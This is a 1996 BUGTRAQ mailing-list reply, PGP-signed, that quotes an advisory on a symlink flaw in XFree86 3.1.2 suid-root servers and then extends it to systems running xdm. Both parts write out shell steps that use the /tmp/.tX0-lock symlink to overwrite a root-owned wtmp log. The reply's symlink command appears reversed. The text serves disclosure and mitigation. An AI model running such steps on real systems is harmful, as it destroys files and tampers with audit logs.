-----BEGIN PGP SIGNED MESSAGE----- On Mon, 29 Jan 1996, David J Meltzer wrote: > Date: Mon, 29 Jan 1996 00:16:46 -0500 > From: David J Meltzer <davem+@andrew.cmu.edu> > To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM> > Subject: XFree86 3.1.2 Security Problems > > There are security holes in XFree86 3.1.2, which installs its servers > as suid root (/usr/X11R6/bin/XF86_*). When reading and writing files, > it does not take proper precautions to ensure that file permissions are > maintained, resulting in the ability to overwrite files, and to read > limited portions of other files. > The first problem stems from the server opening a temporary file, > /tmp/.tX0-lock with mode (O_WRONLY|O_CREAT|O_TRUNC). By making this > file a symlink, the server will overwrite the original file, and then > write to it its current pid. > Other problems exist in the server relating to similar problems, one > such example is the ability to specify an arbitrary file for the XF86config > file which will then be opened, and the first line that fails to match > the expected format will be output with an error, allowing a line to be > read from an arbitrary file. > > Program: XFree86 3.1.2 servers > Affected Operating Systems: All systems with XFree86 3.1.2 installed > Requirements: account on system > Temporary Patch: chmod o-x /usr/X11R6/bin/XF86* > Security Compromise: overwrite arbitrary files > Author: Dave M. (davem@cmu.edu) > Synopsis: While running suid root, XFree86 servers do > not properly check file permissions, allowing > a user to overwrite arbitrary files on a > system. > > > Exploit: > $ ls -l /var/adm/wtmp > -rw-r--r-- 1 root root 174104 Dec 30 08:31 /var/adm/wtmp > $ ln -s /var/adm/wtmp /tmp/.tX0-lock > $ startx > (At this point exit X if it started, or else ignore any error messages) > $ ls -l /var/adm/wtmp > -r--r--r-- 1 root root 11 Dec 30 08:33 /var/adm/wtmp > > Oh well if xdm is running.. The temporary patch won't do you good... Xdm manages a collection of X displays, which may be on the local host or remote servers. Xdm provides services similar to those provided by init, getty and login on character terminals: prompting for login name and password, authenticating the user, and running a ``session.'' Xdm is launched by root.. by default it will start a server on the local display. If the server crashes for some reason, gets killed or if the user sends a server abort sequence, it will restart the server.. $ps -ax |grep xdm 80 ? S 0:00 xdm 142 ? S 0:01 /usr/X11R6/bin/X -auth /usr/X11R6/lib/X11/xdm/A:0-a00080 179 v03 D 0:00 grep xdm $ls -l /var/log/wtmp - -rw-r--r-- 1 root root 31864 Jan 30 02:13 /var/log/wtmp $ ln -s /tmp/.tX0-lock /var/log/wtmp Now, you switch to the local X display and send the <Crtl><Alt><BS> server abort sequence.. Wait until xdm pops up a new server process.. than switch back to shell: $ls -l /var/log/wtmp - -rw-r--r-- 1 root root 11 Jan 30 02:13 /var/log/wtmp Xdm doesn't need to kill the server when a user logs out so the only worry would be the sending of the abort sequence easily fixed by uncommenting in the "Don'tZap" setting in /etc/XF86Config.. but I have seen XF86 crashing so many times for unguessable reason so i don't think it will fix the prob. Maybe someone could take a look at the server sources so it does a system("/bin/rm /tmp/.tX0-lock") just before it a write to the file.. I don't have 'em handy.. ____ \ /__ Anthony C. Zboralski <frantic@worldnet.net> \/ / \/ Finger <frantic@webbar.imaginet.fr> for PGP Public Key -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv Comment: France, Russia and Irak still forbid encryption.. iQCVAwUBMQ141V/59mQ4I551AQGVEgP/aO3+dCX8FA/2sNOeaE6p33u2+Ed1yuPM 2NyI14L3q1RQ7xt8seHQD1KzWxvRJxbSvWKhrIdhSuisAzlh8QJdn4hZ8ulgPNBf uesUvAbvVJjhhandT0wjVbL0rYRBJEs9NJtWTrrF/gZ+5+cuvnKM2iyeTcAY9EGL 2MvbAtN6yr4= =EwzG -----END PGP SIGNATURE-----